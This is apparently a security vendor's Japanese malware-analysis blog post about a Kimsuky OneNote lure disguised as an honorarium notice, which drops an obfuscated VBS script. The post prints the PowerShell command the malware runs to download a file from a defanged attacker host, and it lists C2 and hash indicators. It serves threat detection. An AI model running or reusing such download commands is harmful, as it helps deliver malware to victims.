AhnLab Security Emergency response Center(ASEC)では、謝礼費支給の内容に偽装した OneNote マルウェアが拡散していることを確認した。確認されたファイルは、以下のブログの LNK タイプのマルウェアと同じ研究所を詐称しており、実行される VBS ファイルの不正な振る舞いが似ていることから見て、同じ攻撃グループによるものだと確認できる。
OneNote ファイルを実行すると、以下のように謝礼費支給の内容が含まれており、アレアハングルドキュメントが添付されていると見られる場所でのクリックを誘導する。
図1. OneNote 実行時の本文の内容
この位置には[図2]のようなアレアハングルドキュメントではなく、personal.vbs 名の不正なスクリプトオブジェクトが隠されていた。
図2. 隠された不正なスクリプト
ユーザーがこれをクリックすると、不正な VBS ファイルが personal.vbs の名前で一時パスに生成および実行される。生成された VBS ファイルのコードは、以下のように難読化されたコマンドを注釈のように見せかけ、これを再度読み込んで復号化した後、不正なコマンドを実行する。
図3. personal.vbs コード
復号化されたスクリプトコードは最終的に hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 に接続して、追加のスクリプトコードを実行する。現在はこの URL に接続できないが、URL の形態から見て、以下のブログのように情報流出機能を持つスクリプトを実行したものと推定できる。
その後 PowerShell コマンドを通して hxxp://delps.scienceontheweb.net/ital/info/sample.hwp からアレアハングルファイルをダウンロードして実行する。
- 実行される PowerShell コマンド
powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace(‘shell:Downloads’).Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\personal.hwp;start-sleep -seconds 1
図4. 最終的に実行されるスクリプトコード
解析当時はアレアハングルドキュメントがダウンロードされなかったが、正常なドキュメントファイルに見せるために正常なアレアハングルドキュメントをダウンロードしたものと推定される。また、OneNote に作成されたアレアハングルファイル名が<パスワードファイルに偽装して拡散しているマルウェア>のブログの[図10]と同じ(個人情報利用同意書.hwp)名前を使用しており、これと同じような様式のアレアハングルドキュメントが実行されるものと推定される。
最近 Kimsuky グループが Word ドキュメントで配布していたマルウェアを、CHM、LNK、OneNote などの様々な形式で配布していることが確認されているため、ユーザーは特に注意する必要がある。このファイルは主に謝礼費の様式、個人情報の様式に偽装してメールで拡散しているため、ユーザーは添付ファイルの実行に注意しなければならない。
[ファイル検知]
Dropper/MSOffice.Generic (2023.03.20.02)
Trojan/VBS.Generic.SC186657 (2023.03.03.00)
[IOC]
MD5
aa756b20170aa0869d6f5d5b5f1b7c37 – OneNote
f2a0e92b80928830704a00c91df87644 – VBS
C2
hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories: マルウェアの情報